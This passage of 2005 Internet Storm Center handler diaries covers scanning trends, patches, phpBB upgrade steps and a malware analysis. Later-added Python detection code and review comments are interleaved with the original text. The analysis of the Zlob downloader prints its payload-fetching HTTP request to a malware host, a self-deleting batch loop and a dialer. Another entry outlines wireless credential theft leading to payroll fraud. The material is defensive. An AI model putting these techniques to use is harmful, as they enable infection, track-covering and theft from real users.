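    sports_by_src = defaultdict(set)
    dports_by_src = defaultdict(Counter)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        src, spt, dpt = rec
        sports_by_src[src].add(spt)
        dports_by_src[src][dpt] += 1
    return {
        src: dports_by_src[src]
        for src, sports in sports_by_src.items()
        if sports == {sport}           # exclusively the fixed source port
    }


def port_summary(scanners):
    """Hits per destination port across all fixed-source-port scanners."""
    total = Counter()
    for counts in scanners.values():
        total.update(counts)
    return total


# Constructed sample. 192.0.2.77 mixes source ports, so it is NOT the tool;
# the other two sources use 3001 exclusively.
SAMPLE_LOG = [
    "Jul 22 03:14:01 fw kernel: IN=eth0 OUT= SRC=192.0.2.10 DST=198.51.100.5 LEN=48 PROTO=TCP SPT=3001 DPT=1433 SYN",
    "Jul 22 03:14:02 fw kernel: IN=eth0 OUT= SRC=192.0.2.10 DST=198.51.100.6 LEN=48 PROTO=TCP SPT=3001 DPT=1433 SYN",
    "Jul 22 03:14:03 fw kernel: IN=eth0 OUT= SRC=192.0.2.10 DST=198.51.100.7 LEN=48 PROTO=TCP SPT=3001 DPT=42 SYN",
    "Jul 22 03:15:10 fw kernel: IN=eth0 OUT= SRC=192.0.2.77 DST=198.51.100.5 LEN=48 PROTO=TCP SPT=3001 DPT=6101 SYN",
    "Jul 22 03:15:11 fw kernel: IN=eth0 OUT= SRC=192.0.2.77 DST=198.51.100.5 LEN=52 PROTO=TCP SPT=45120 DPT=80 SYN",
    "Jul 22 03:16:40 fw kernel: IN=eth0 OUT= SRC=203.0.113.9 DST=198.51.100.9 LEN=48 PROTO=TCP SPT=3001 DPT=6101 SYN",
    "Jul 22 03:16:41 fw kernel: IN=eth0 OUT= SRC=203.0.113.9 DST=198.51.100.9 LEN=60 PROTO=UDP SPT=3001 DPT=53",
]

if __name__ == "__main__":
    found = fixed_source_port_scanners(SAMPLE_LOG)
    for src, counts in found.items():
        print(src, dict(counts))
    print("totals:", dict(port_summary(found)))
```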

New Discussion Forum

The SANS Internet Storm Center's CTO, Johannes Ullrich, has created a new web view into the popular DShield discussion list. Additionally, he built a new online discussion forum for those who want to openly discuss items in the Handler's Diary. The site for both forums is at http://forum.dshield.org and we hope to hear from everybody over there! (Remember that these are PUBLIC forums, anything you post can and will be read by others. If you want to send the Storm Center something in confidence please use our contact form at http://isc.sans.org/contact.php and tell us by using the check blocks at the bottom whether we can release your name and other details.)

Small Website Change

We've made a small change to our website. It now has a <meta http-equiv="refresh" content="600"> tag so that it will automatically fetch an update every 10 minutes. That way you can leave it open in a browser tab (you DO use tabs, don't you?) and it will stay up to date without manually refreshing.

Cisco Humor

SANS Instructor Chris Benton stumbled on a site that will bring a bit of humor to our otherwise busy lives. Check out http://routergod.com and read insightful articles such as

- Paris Hilton On CCIE Storage

- Gillian Anderson on LAN Switching

- Gunney Sgt. Hartman at CCNA Boot Camp

- Paul Hogan Tells Us About HSRP

- Arnold on PIX Turbo Access Lists

- Trinity on IP-Helper addresses

- Agent Smith Explains Syslog

- Charles Manson On Static Routes

- Mister Rogers on the RS 232

- 7 of 9 on OSPF


SANS Washington, DC


I'll be teaching SEC 401, SANS Security Essentials, in Washington, DC later next week. If you can stop by, please do so to say hello. A few of the handlers will be there and we always like to meet our readers! There is still plenty of time to register if you haven't already done so. This is a great time of year to come see Washington with your family. It's hotter than hootie tootie but that's why we Southerners invented air conditioning! :)




Marcus H. Sachs

Handler on Duty

Published: 2005-07-22

Port 1433 TCP scanning is up!; Firefox 1.0.6 available - Critical Update; MySQL patches zlib remote vuln; Glitch in The Matrix - Port 2100; One RingTone to Rule Them All?; SlimFTPd vuln PoC released;

Firefox 1.0.6 available - Critical Update

Shane Castle just sent a note to us that Firefox 1.0.6 is out. Thanks Shane!


And contributor Don Thornton sent us the following information - "Firefox 1.0.6 is a stability fix, not a security fix. It's marked critical because of the number of problems reported using 1.0.5. According to the release notes at the only thing changed in this version was to 'Restore API compatibility for extensions and web applications that did not work in Firefox 1.0.5.'" Thanks Don!

MySQL patches zlib remote vuln

MySQL Vendor Information



Security improvement: Applied a patch that addresses a zlib data vulnerability that could result in a buffer overflow and code execution. (CAN-2005-2096) (Bug #11844)

Secunia Advisory: SA16170
Release Date: 2005-07-22
Criticality: Highly critical
Impact: DoS, System access
Where: From remote
Solution Status: Vendor Patch
Software: MySQL 4.x

Glitches in The Matrix

Port 1433 TCP scanning is approaching record highs.

Port 2100 (Oracle XDB) scanning has been seen spiking/increasing at DShield, REN-ISAC and the MyNetWatchman reporting sites.

Port 3001 is rising too.

Please participate and submit any unusual activity or captures! Thanks!

One RingTone to Rule Them All?

MobileATM application concerns.

John Leyden has another interesting Register article that covers British bank deployment plans for MobileATM and discusses a security consulting firm's experience testing similar mobile-phone application security.

The security consulting firm bases its "warning on tests of other mobile Java applications on behalf of several clients in the mobile gambling market rather than on the MobileATM service, which it hasn't tested. Ken Munro, managing director of SecureTest, said the comparison is appropriate because the same type of technology and distribution methods are applied in both cases."

I note here that my use of "RingTones" as a title is editorial license, there is no connection between RingTones and the security issues covered in the article, yet ...

PoC has been released for the SlimFTPd Multiple Commands Remote Buffer Overflow Vulnerability

- "have buffer overflow vulnerabilities that could potentially lead to remote code execution. The exploits are only possible if the remote user can successfully log in. Users are advised to upgrade to SlimFTPd 3.17 immediately!"

Vuln Announcement at FrSIRT -

New Spam Details

Eric Conrad, Jim Slora, and an anonymous contributor sent information about new spam they're seeing at their networks today. The spam has the following characteristics:

"The Subject line is merely "1", the forged mailfrom is approximately the first 8 characters of the target address plus a forged domain. There is an attachment called "1.txt" and a message text body that begins on a new line "ICA=" plus three characters, the first one of which may be low-bit ASCII and the second two are low-bit or high-bit.

The sources include zombie networks, normal mail servers, and bounced messages from normal servers."

Thanks for the analysis and submissions folks!
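The reported traits turned into a mail-filter heuristic, as an added example (not the contributors' own rule): subject "1", a forged sender built from the first 8 characters of the target's local part, a "1.txt" attachment, and a body opening with "ICA=" plus three characters. The specimen is constructed with Python's email package, not a real capture, and the exact-8-character sender check is a simplification of the "approximately" in the report.

```python
import base64
import email
import email.utils
from email import policy
from email.message import EmailMessage

# "ICA=" is the base64 encoding of two spaces (0x20 0x20): the visible body is
# effectively empty once decoded, which fits a content-filter evasion attempt.
BODY_PREFIX_DECODED = base64.b64decode("ICA=")


def build_sample(target: str, subject: str = "1", attachment: str = "1.txt") -> bytes:
    """Constructed specimen with the reported traits (not a real capture).
    The defaults reproduce the pattern; change them to get a non-matching message."""
    local = target.split("@", 1)[0]
    msg = EmailMessage()
    msg["From"] = f"{local[:8]}@forged.example"   # forged sender: first 8 chars of target
    msg["To"] = target
    msg["Subject"] = subject
    msg.set_content("\nICA=aZq")                  # body starts on a new line: ICA= + 3 chars
    msg.add_attachment(b"\n", maintype="application", subtype="octet-stream",
                       filename=attachment)
    return msg.as_bytes()


def looks_like_one_txt_spam(raw: bytes, target: str) -> bool:
    """Heuristic matcher for the reported characteristics; all four must hold."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    if str(msg["Subject"] or "").strip() != "1":
        return False
    from_addr = email.utils.parseaddr(str(msg["From"] or ""))[1]
    from_local = from_addr.split("@", 1)[0].lower()
    target_local = target.split("@", 1)[0].lower()
    # Simplification: require exactly the first 8 characters of the target local part.
    if not from_local or from_local != target_local[:8]:
        return False
    if not any((part.get_filename() or "") == "1.txt" for part in msg.iter_attachments()):
        return False
    body_part = msg.get_body(preferencelist=("plain",))
    body = body_part.get_content() if body_part is not None else ""
    first = body.lstrip("\r\n")
    # "ICA=" followed by at least three more characters on that line
    return first.startswith("ICA=") and len(first.split("\n", 1)[0]) >= 7
```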

Patrick Nolan
Published: 2005-07-21

MS05-036 Color Management Exploit Code in Wild; mod_jrun exploit scanning from Europe; Insecure by Design

MS05-036 Color Management Exploit Code in Wild



We've received reports that the Color Management Module ICC Profile Buffer Overflow Vulnerability has exploit code available and is being used out in the wild. The vulnerability information from Microsoft is available over at . To mitigate this vulnerability, apply the appropriate patch. It appears that this version of the exploit code will only crash the browser, but it wouldn't be difficult to put in code for execution. put out an advisory on the code being in the wild this morning.

mod_jrun exploit scanning from Europe



A reader sent in an email with the observation of a large increase in mod_jrun exploits being thrown at webservers. Has anyone else seen similar behavior or problems and, if so, an IP list of sources and the specific attacks being used?

Insecure by Design



*Disclaimer* - This won't be as interesting as Tom's FTBM. Sorry. I'm not that creative. I can do haiku, that's about it.

Let's say at a fictional organization, they offer wireless for their clients, employees, guests, and so on. In a town that has free wireless almost everywhere, it's almost a political necessity to offer wireless, despite the security issues. At first, they required all wireless users to authenticate through a VPN server and then have full and complete access to the internet. Some complained, so they developed an economy solution that uses a username and password to authenticate via a webserver, after which you get limited access to the internet. Not secure, no... but a compromise, if not for one thing.

The password the users have to use and type in is the master password for a multiple logon environment. This password controls all others and allows you to change them, including the password that controls, say, direct deposit for employees. Say you want to make some money. Here's how you do it.

Remember airpwn? Allegedly the only interesting thing out of this year's DefCon? It shows you that if you are on the same subnet as someone, you can always respond to their requests faster than a remote server. So, when someone walks up, sits down, and fires up their web browser, your evil hacker machine sends a request with a "fake" webpage back to the user. Sure, you might have the real webserver using SSL, but would an end-user really check to make sure their session is encrypted? Would you? If you answered yes, you are either working for a 3-letter security agency or aren't being honest with yourself.

They send you their credentials, you have them tunnel through you out to the Internet. Everyone is happy, no one suspects a thing. Then you wait til a day or two before the end of the month for payday. You start changing direct deposit information. Money comes in, you get out of town. Sure, that's crude and you'd get caught, but I'm not an expert in laundering money.

The point is, if you are going to offer wireless, it will be insecure if you don't tunnel it through a VPN, and even then it could have problems. The second point is, if you are going to choke down that risk, please don't make the users authenticate with credentials that mean something and give them access to anything important. The information is easy enough to steal and there are plenty of 14 year olds out there with laptops wanting to try.

-----------

John Bambenek

bambenek -at- gmail -dot- com

(insert obligatory 'ph' joke here)
Published: 2005-07-20

Google Strangeness: Is It New?; Filthy Minkey; New phpBB; FTBM VII: Afterglow

Google Strangeness: Is It New?


While the consensus (our consensus... Google isn't talkin') is that Google is probably using the redirects through their site as a ranking device, there is a whole lotta' division about whether this behavior represents anything new. We're still looking into the situation.



I was talking to the Gypsy and his filthy minkey...


If you use the GreaseMonkey extension for Mozilla-based browsers, current wisdom is to disable the chimp until a fix for a remote file viewing exploit is forthcoming. More info is available at the GreaseMonkey site:



http://greasemonkey.mozdev.org/


phpBB 2.0.17 released


This newest release fixes some security issues due to XSS and adds some new functionality.



URLs:

Announcement:

- http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=308490

Tutorial for heavily modded boards:

- http://www.phpbb.com/phpBB/viewtopic.php?t=308426

Downloads:

- http://www.phpbb.com/downloads.php



Fellow Handler Swa Frantzen sent me a play-by-play of the upgrade:



1. Make backup
# cp -r <forum> <backup>

2. make sure the backup is offline (contains vulnerable code)
# chmod 0 <backup>

3. Patch the files

Patching or copying of the replacement files.
Modded boards need to do this very carefully.

admin/admin_ug_auth.php
- the pending list for groups.

admin/admin_users.php
- escaping of the username

includes/bbcode.php
- the XSS issue:
less liberal acceptance of exotic chars in URLs
will break I18N domain names (might not be that bad after all)
[Funny, I remember this code being changed in 2.0.16 as well]
still it seems to match now (e.g.)
#\[url=([\w]+?://[\w\#$%&~/.\-;:=,?@\[\]+]*?)\]([^?\n\r\t].*?)\[/url\]#is
which still allows a lot to match to something of the format of
[url=xxxx://www.phpbb.com]phpBB[/url]

includes/functions.php
- unclear, my knowledge of php & their code is lacking

diff:
9c9
< * $Id: functions.php,v 1.133.2.35 2005/07/19 20:01:11 acydburn Exp $
---
> * $Id: functions.php,v 1.133.2.34 2005/02/21 18:37:33 acydburn Exp $
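Review bot: the $Id revisions show that the `<` side is the newer file (1.133.2.35, dated 2005/07/19) and the `>` side the older one (1.133.2.34, 2005/02/21), so this diff was produced new-versus-old; in the hunks that follow, read the `<` lines as the fix and the `>` lines as the code being replaced. Worth stating in the notes, since readers used to `diff old new` will otherwise invert every change.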

120c120
< if (!is_numeric($user) || $force_str)
---
> if (intval($user) == 0 || $force_str)
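Review bot: `!is_numeric($user)` is a broader test than `intval($user) == 0`, and the two disagree at the edges: is_numeric() accepts strings with leading whitespace, a decimal point or exponent notation ("1e3"), and a literal "0" now takes the numeric branch where before it fell through to the string branch. If $user is interpolated into SQL on the numeric path, pair the check with an explicit `(int)` cast so that only an integer reaches the query rather than whatever is_numeric() happened to accept.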

581c581
< define('HAS_DIED', 1);
---
> define(HAS_DIED, 1);
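Review bot: `define(HAS_DIED, 1)` on the old side passes an undefined constant as the name, which PHP converts to the string 'HAS_DIED' while raising a notice; the quoted form on the `<` side is the correct call. There is no behaviour change beyond silencing the notice, so this is a cleanup riding along with the security fix and could be flagged as such rather than left for readers to puzzle over.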

includes/functions_validate.php
- call clean function instead of
user name length limit (25 char) and escaping of single quotes.

includes/usercp_activate.php
- add test to see if the admin is doing the activation when needed

includes/usercp_viewprofile.php
- adding username in the search functionality of the
viewprofile control panel

privmsg.php
- big changes in handling of deletion of messages it seems

templates/subSilver/faq_body.tpl
- change a href from "#Top" to "#top"
Doing this properly would require making this change in ALL
installed templates, not just in subSilver. If you changed or
added templates this can be hard.

viewtopic.php
- adding username in the search functionality

4. copy script (kills board)
# cp -r <src dir>/contrib <forum>
# cp -r <src dir>/install <forum>

5. run database update script
http://<site>/<forum>/install/update_to_latest.php

6. remove script
# rm -r <forum>/contrib
# rm -r <forum>/install

7. test and get back in business.


Follow the Bouncing Malware VII: Afterglow



Disclaimer:



Let's face it: not everyone is smart. There are some people in this world that can best be described as being all foam, and no beer. They are the reason for those little stickers on your hair dryer reminding you that using electrical appliances while bathing is a bad idea. ('Scuse me... You there... the one who said "It is?"... Go home. Now.) The following is for *those* people:



If, during the course of this malware tour de force, I happen to mention a website address, DO NOT GO TO THAT SITE.



Yes, *I* go to these sites. But if you read these rantings of mine closely, you'll discover something else: I'm somewhat crazy. I'm also ten foot tall and bullet-proof. And I floss.



Daily.



If, despite this warning, you visit one of the sites I discuss and get infected, please write in to tell me. I can always use a good laugh.

The story thus far:



(The Reader's Digest version is below, or, you can read the full thing here: )



Joe Sixpack, the protagonist of this little stream o' consciousness, went looking on the 'Net for some "entertainment" in the form of video clips of folks repeatedly attempting procreation and other, various, athletically-challenging "events." Needless to say (but I'm saying it anyway... go figure), he found it. But, just like the Space Shuttle, when Joe was all...ahem... ready for launch, he got grounded: according to the "smorgasbord o' smut" website that he had found, he needed to load something called a "codec" onto his computer for the movin' pictures to... well... move.



Traipsing over to www.vcodec.com, Joe found just the thing: a file called "vc3_05.exe" which promised to make even the poorly lit, unevenly edited, cheesy dialogue and cheap background music of a low budget porn flick into a work of digital art.



Not one to let anything stand between him and (as the Supremes like to put it) stuff "without redeeming social importance" (and no, I wasn't talking about the ladies who sang with Diana Ross...), Joe installed that sucker lickity-split. (Note to Puritans who like to write complaint emails: That phrase only *sounds* dirty... really...)



As it turned out, however, Joe (who really *is* all foam/no beer), had actually infected himself with what is now identified as Win32.TrojanDownloader.Zlob.G, a chunk of "Yes, Master..." malware that took its marching orders from a command file downloaded from fhgstr.com. The command file directed it to download nine (count 'em nine...) more programs for Joe (gifts!). In today's installment (titled "Afterglow"), we'll track what happens to Joe's computer as it's gettin' the same thing the folks in Joe's movie are gettin'...



Notes/Feedback from FTBM VI:



1) Yes, I know I spelled eulogize wrong. It was a joke. It was a pun. A EULA is an End User... oh, never mind...



2) There is pornography on the Internet. It's no use complaining to me about it. I didn't put it there and, to the best of my knowledge, don't appear in any photos or videos.



3) Personally, I thought I handled the subject with my usual grace and dignity (i.e. none :-). For those of you who disagree, perhaps the problem is with your interpretation. I quote from one of the unsung geniuses of modern parody music:




Old books can be indecent books,
Though recent books are bolder.
For filth, I'm glad to say,
Is in the mind of the beholder.
When correctly viewed,
Everything is lewd...
--Tom Lehrer, "Smut"


4) No one out there recognized that the section names in FTBM VI were taken from the old-fashioned title cards in the movie "The Sting." I'm very disappointed in all of you.

Afterglow:



While Joe is... uh... keeping busy, so is his computer. At the behest of the fine folks running fhgstr.com, Joe's computer sends out nine HTTP GET requests, that it formulates based on this data:



6e
M7081700.so|K7111600.so|DA7021900.so|X7081700.so|Z7121900.so|A6291400.so|HP7081700.so|P7091300.so|S7081700.so
0



that it downloaded in a request to "info.php" on fhgstr.com.



These nine GET requests look like this:



GET /downloadex.php?file=M7081700.so&land=1033 HTTP/1.1
User-Agent: 029dn-2c-02cn-4n0238-402cn8304c=1-n234c-192=3-12-0jd0912093712-4917b-2c0812308b1c2038
Host: fhgstr.com
Cache-Control: no-cache



and, in fact, this downloads the first file, M7081700.so.
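An added example, not part of Tom's write-up: the "6e" and "0" lines around the file list read like HTTP/1.1 chunked transfer encoding, where 6e is a hex byte count (0x6e = 110, which is the 109-character list plus a trailing newline) and 0 is the terminating chunk. Under that assumption the decoder below recovers the nine names, and a second function then picks the matching downloadex.php fetches out of proxy log lines, which are constructed here rather than captured.

```python
import re

# Constructed from the nine names in the command file; the framing (6e ... 0)
# is assumed to be HTTP/1.1 chunked transfer encoding of the info.php response.
FILE_LIST = ("M7081700.so|K7111600.so|DA7021900.so|X7081700.so|Z7121900.so|"
             "A6291400.so|HP7081700.so|P7091300.so|S7081700.so")
INFO_PHP_BODY = b"6e\r\n" + FILE_LIST.encode("ascii") + b"\n\r\n0\r\n\r\n"


def decode_chunked(body: bytes) -> bytes:
    """Decode a chunked body: '<hex-size>[;ext]CRLF <data> CRLF' repeated,
    terminated by a zero-size chunk. Raises ValueError on a truncated chunk."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";", 1)[0].strip(), 16)
        pos = eol + 2
        if size == 0:
            return bytes(out)          # optional trailers follow; not needed here
        chunk = body[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("truncated chunk")
        out += chunk
        pos += size + 2                # skip the CRLF that ends the chunk data


def command_file_names(body: bytes) -> list:
    """The pipe-separated download list the trojan receives from info.php."""
    return [n for n in decode_chunked(body).decode("ascii").strip().split("|") if n]


# Constructed proxy log lines (combined format with absolute URLs); not real traffic.
SAMPLE_PROXY_LOG = [
    '10.0.0.5 - - [20/Jul/2005:12:00:01 -0500] "GET http://www.example.org/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [20/Jul/2005:12:00:07 -0500] "GET http://fhgstr.com/downloadex.php?file=M7081700.so&land=1033 HTTP/1.1" 200 7588 "-" "029dn-2c-02cn-4n0238-402cn8304c=1-n234c-192=3-12-0jd0912093712-4917b-2c0812308b1c2038"',
    '10.0.0.9 - - [20/Jul/2005:12:00:09 -0500] "GET http://fhgstr.com/downloadex.php?file=K7111600.so&land=1033 HTTP/1.1" 200 4611 "-" "029dn-2c-02cn-4n0238-402cn8304c=1-n234c-192=3-12-0jd0912093712-4917b-2c0812308b1c2038"',
]

DOWNLOAD_RE = re.compile(
    r'"GET (?:https?://[^/\s]+)?/downloadex\.php\?file=([A-Za-z0-9]+\.so)&land=\d+ HTTP/1\.[01]"')


def find_command_file_downloads(log_lines, names):
    """(client_ip, file) for each log line that fetched one of the listed .so files."""
    wanted = set(names)
    hits = []
    for line in log_lines:
        m = DOWNLOAD_RE.search(line)
        if m and m.group(1) in wanted:
            hits.append((line.split()[0], m.group(1)))
    return hits
```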



M7081700.so is a 7588 byte long executable, that is, once again, packed with FSG. When it is launched, it copies itself to:



Windows\System32\msole32.exe



and creates two registry keys:



HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run



and populates the "run" key with a value entitled "winlogon.exe", which actually points to "msole32.exe".



Now that it has set itself up to be auto-launched at restart, it hangs in the background waiting for... well... something. I'm not really sure what triggers it, but eventually, it pops up a caution triangle containing an exclamation point in the systray, and fires up one of those cute little WinXP "notification balloon" thingies with one of several possible warnings:



Critical System Error!
Please read this message carefully.
Your PC is infected by spyware.
You must improve your PC security and system perfomance by deleting
spyware from your operating system.
Click the icon to remove spyware.

Attention! Failure to delete spyware from your PC can reslut in damage
of system resources and your personal files corruption.
Use special software to remove spyware and adware from your computer.
Click "OK" to get all available Anti Spyware software.

System Warning! 4 Errors found:
-Your computer has slowed down
-Your Internet connection speed has decreased
-You get popups and annoying ads when you're online or sometimes even offline
-Your default home page has been changed to the one you didn't ask for
Click "OK" to download spyware scan and delete infected files.

System perfomance notice.
Perfomance of your system is extremely low.
The main reason is adware popups. To improve perfomance of your PC you
have to remove or block popup's source from operating system.
Please, use special software to remove adware materials from your computer.
Click "OK" to get full list of available "PopUp Blocking" software.

Critical System Error!
Please read this message carefully.
System detected virus activities. They may cause critical system
failure. Please,use antivirus software to clean and protect your
system from viruses and parasite programs.
Click "OK" to get all available software.

System Alert: Spyware Detected
System has detected 4 active spyware applications that may cause frequent
application crashes, instability or low
computer perfomance.
Click the icon to remove spyware.

System Alert: Popups
Your PC is infected with popups adware (OHPE ver 4.12_23).
Click the icon to get all available anti popup software.
Click the icon to remove spyware.

Security Alert!
System encountered spyware that gathers your private information without
your consent. This information includes passwords, credit card details
and other private data.

Urgent System Message: Virus!
Your computer was infected with last version of internet
worm (iworm_attck_v122.02a). It is highly recommended that you install
antivirus software.
Click the icon for more information.

System Alert: Adware & Spyware
Your computer has slowed down. Your Internet connection speed has decreased.
You receive more spam emails than ever. Use Spyware scan to find
out the reason
Click the icon to remove spyware.


Dang! Isn't that amazing? That software KNEW that Joe's PC was infected with spyware and yet in my analysis, I never saw any code that would indicate that it scanned his computer at all. Hmmm.... how could it know that?



"I am malware, therefore, you are infected"



(With sincere apologies to Rene Descartes)



Clicking on "the icon" takes you to various sub-pages of www.securityindex.net, where some fine folks who write with the same stilted grammar exhibited above, will be glad to sell you Adware Delete Cleaner (which actually, to me, sounds like it removes adware deletion software...), AntivirusGold, or Spyware Sheriff (with the optional Deputy Trojan plug-in module ;-).



And just in case you were wondering, I *always* purchase my anti-malware programs from ads that pop up on my screen...



'Nuff said.



The next piece o' malware on today's hit parade is K7111600.so, a 4,611 byte long, executable that (for once!) isn't packed or obfuscated in any way.



Cracking this one open, reveals a couple of interesting strings:



http:/ez-finder.com/avg.exe

http:/ez-finder.com/dd.exe

SOFTWARE\AntivirusGold

COMSPEC



@echo off

:start

echo > %1

del %1

if exist %1 goto start

del %0



(note: the links have been slightly altered)

Seems that AntivirusGold is a popular product among malware authors...



The second half of those strings is actually a small DOS batch file that attempts to kill off a particular file, the name of which is passed as a command line parameter. If the file doesn't delete, it simply loops back around and tries again. Once the deletion succeeds, it then deletes itself.



This is a means used by malware authors to cover their tracks and delete their files when they complete their nefarious deeds. As you know (or perhaps you didn't) an executing file cannot be deleted, because it is memory mapped by the operating system and locked from removal. By setting up a looping batch file like this, continually attempting to delete their main executable, when the main program ends, the whole shootin' match disappears.



What else does the main program do? Well, in this case, it downloads AntivirusGold ("avg.exe") and something called "dd.exe" from the fine folks at ex-finder.com:



avg.exe: 2,663,231 bytes

dd.exe: 36,864 bytes



I'll take a closer look at these two in a future FTBM, but for now, let's move on to another of the "gifts" being installed while Joe is... er... otherwise occupied.



DA7021900.so is 4,099 bytes of downloadin' goodness that retrieves the provocatively named "X.exe" a 14,848 byte long executable from either 48.dapfeed.com or 773.dapfeed.com. The interesting thing here is that the file that is being downloaded, X.exe, is only about 10K larger than the DA7021900.so downloader... so what is the advantage of using the downloader? Obviously, it would be possible for the malware folks to substitute another file for X.exe, but at the time of writing, this ain't the brightest move they've made.



X.exe turns out to be a "dialer" program, software that modifies your dial-up connection settings so that your Internet connection is made through a 1-900-BIG-BUCKS per minute provider. Specifically, this one dials 1-900-444-0307.



So... what's the score-card look like so far? While Joe is watching his movie, he's been treated with the installation of nine pieces of software, three of which we've examined in detail:



M7081700.so - 7,588 bytes
K7111600.so - 4,611 bytes
DA7021900.so - 4,099 bytes
X7081700.so - 2,716 bytes
Z7121900.so - 2,600 bytes
A6291400.so - 34,819 bytes
HP7081700.so - 39,396 bytes
P7091300.so - 21,088 bytes
S7081700.so - 18,036 bytes



The programs that we investigated today installed:



avg.exe - 2,663,231 bytes
dd.exe - 36,864 bytes
X.exe - 14,848 bytes



Joe's dial up connection has been whacked, and so the next time he dials out, he'll be paying phone-sex, per-minute pricing for his 'Net connection.



But he did get AntivirusGold installed on his machine for free. So how bad could it all be?



Just wait......



-------------------------------------------------------------------------

Handler on Duty: Tom Liston ( http://www.intelguardians.com )


Published: 2005-07-19

We're Phull... Article about Bank Fraud. Google Strangeness. SSH Probe Reveals Big-Time Hack.

No more ph.


Thanks for all of the ph words from yesterday. We're full now, so please don't send any more.

If you want to see the creativity of your fellow readers, check out their ph-word suggestions from . But, again, no more, thank you.



Internet Fraud Article


If you want some news, check out
about the costs of on-line theft to banks in Australia, sent to us by alert reader Malcolm Murray.



Google Strangeness


Nathan, an observant reader, pointed out some unusual Google issues today. Seems that, in some browsers, when you do a Google search, your search results actually include a link back to Google, which then forwards your browser to your intended search target. Nathan mentions:




>> Searching on TCPMP yields several results.
>> In the 9th result, look at the
>> URL: http://www.google.com/url?sa=U&start=9&q=http://mytreo.net/news/archives/000496.php&e=10053



That’s interesting... You click on a search result in Google, which sends you right back to Google, which forwards you to another URL. I couldn’t reproduce this on Apple Safari or my fully patched WinXP SP2 box with IE 6. Mike Poor couldn’t reproduce it on Lynx. But, we did see this behavior on a fully patched Win2K Pro box with IE 6. It appears to be some Javascript that’s pulling this off, perhaps allowing the omnipresent Google eye to capture even more data about what we’re up to… but don’t worry… their is: “Don’t Be Evil.”

SSH Probing Reveals Big-Time Probs


Another alert reader sent in a message about yet another SSH userID and password-guessing scan that showed up in his logs. “Yawn,” I’m sure you’re thinking. But wait… there’s more. Turns out, this scan was coming from a pretty sensitive institution with pretty sensitive information. The reader said he was concerned about compromise of such a place, which made fellow-handler Kyle Haugsness urge me to contact them. I phoned the organization whose server was used to launch the scan. At first, they thought it was just an unimportant file server that had been hacked and used as a launch point for further attacks on other sites… But, before long, they realized it was a massively important server in their environment! We worked with them to handle that issue, but we all need to keep in mind – It’s absolutely crucial to have a strong handle on your asset inventory. Know what your organization has connected to the Internet, and watch those boxes carefully!




In this particular case, the bad guys had activated sshd so they could get strongly encrypted access to the machine. If you ever have a system that doesn’t have an sshd running, and then one suddenly starts up, please investigate immediately. I’m not saying that sshd is bad. It’s an extremely useful tool in managing your systems securely. However, if you don’t use it, but then see it start running mysteriously, look into it immediately.




So, in the end, what started out as a yawner was really a fascinating (albeit somewhat scary) case.




Further Reports of Exploits Against MS05-037


A reader desiring anonymity told us that he’s seen some exploits of his systems by malicious websites using Microsoft Internet Explorer Javaprxy.DLL COM Object Instantiation Heap Overflow Vulnerability (described in MS Security Bulletin MS05-037) to install malware. Looks like we better step up that patch rate, since this one could be a big problem.




Over and out—

--Ed Skoudis

Intelguardians

ed (at) intelguardians.com
Published: 2005-07-18

Phlooding newest marketing phabrication; Call for ph-words

Phlooding newest marketing phabrication



has published a press release describing a new zero-day attack they have discovered that targets wireless networks. The press release describes an attack where several geographically dispersed systems launch a flood of authentication attempts against an IEEE 802.1x authentication server (using an EAP type such as PEAP or TTLS). This may cause the authentication server to experience performance degradation, and may cause valid user accounts to be locked out from multiple failed login attempts.



While I question the motives behind coining another cutesy "ph" name to describe this attack, it does accurately describe a vulnerability in 802.1x wireless network authentication. Since anyone can authenticate to the wireless network, it is possible to generate enough traffic such that it is detrimental to the authentication server. Further, a smart attacker can monitor for plain-text username transmissions used in PEAP/MS-CHAPv2 when users connect to the network, and then attempt to mount a brute-force attack as that username. In the case where account locking after multiple failed login attempts is enabled, this will amount to an effective DoS attack against the network.



Links:







Call for ph-words


In a pre-emptive strike to marketing bodies everywhere, we're seeking ph-word submissions phrom out phine readers. We'll publish a list of phine words later tonight. Submit your words using the
.



Rules: Submissions have to be a word that starts with "f". There is one phour-letter word that would become a phive letter word that won't be on the list.

We've been getting lots of submissions surrounding "phlatulence". This really isn't necessary. :)



Update: 4:56pm EDT - Last round of words


Thanks to all who submitted words today! I know the handlers enjoyed reading the (ahem) "phlood" of messages, and I hope our readers enjoyed them as well.



Joel Katzman

phortune - what the phishers have after they empty out the bank accounts

phork - what phishers use instead of chop-sticks




David

Phorgetful - What users are when asked if they clicked yes on the security warning to install that program from that really cool game site



Musky

Phorensics - The set of predefined and accepted procedures for pretending to analyze the phony bank email forwarded to you by your friends and/or coworkers. ISC Note: This is not what Handlers do!


Ben

Pheature - An undocumented program perk or bug easily taken advantage of usually by someone half-way across the world


Scott

Philler - the extra words in a SPAM email to convince the SPAM filters that this is a legitimate message, but make absolutely no sense when read by a human ("Classic coffee baby Venezuela doubles dock joined disk sunny verification bloating.")


Update: 1:19pm EDT - More ph-words!


Andy, Danny and Bruno

phorthcoming - what companies are who helpfully store customer data and SSNs on externally accessible databases

phedexed - what sometimes happens to backup tapes with highly sensitive data on it

phlabbergasted - state of the CEO of a company to which happened either or both of the above

pheds - those called in to investigate




Nick Nuessle

Phashionable - security by fad (as opposed to vulnerabilities/protections)

Phat - bloat in code, useless documentation (like those disclaimers), code notable for being cute (and marginally functional), a brainstorming session mostly involved with marketing

Philter - An irrelevant barrier

Phunk - Residual attitude after a useless meeting

Phuzzbuster - An early warning system the manager in heading by

Phamily - a collection of related products that do not interface

Phlake - someone totally taken-in by marketing literature, one with no tech-skill who has to have the newest/greatest

Phiction - pre-release literature, time cards

Phortress - a superficially secure site

Pherret - research-in-earnest, troubleshooting with intent to discover-&-solve




Dr. Neal Krawetz

Phifo - garbage in, useful stuff out

Fipho - good stuff in, garbage out

Philter - using a computer to sort data

Phil - The guy who made PGP

Phlush - A DoS by sending a bunch of the same data

Filanthropic - (converting ph to f) Hackers donating hacked systems to less phortunate hackers




Bill Higler

phlattery - one phorm of social engineering, usually a prelude to phishing

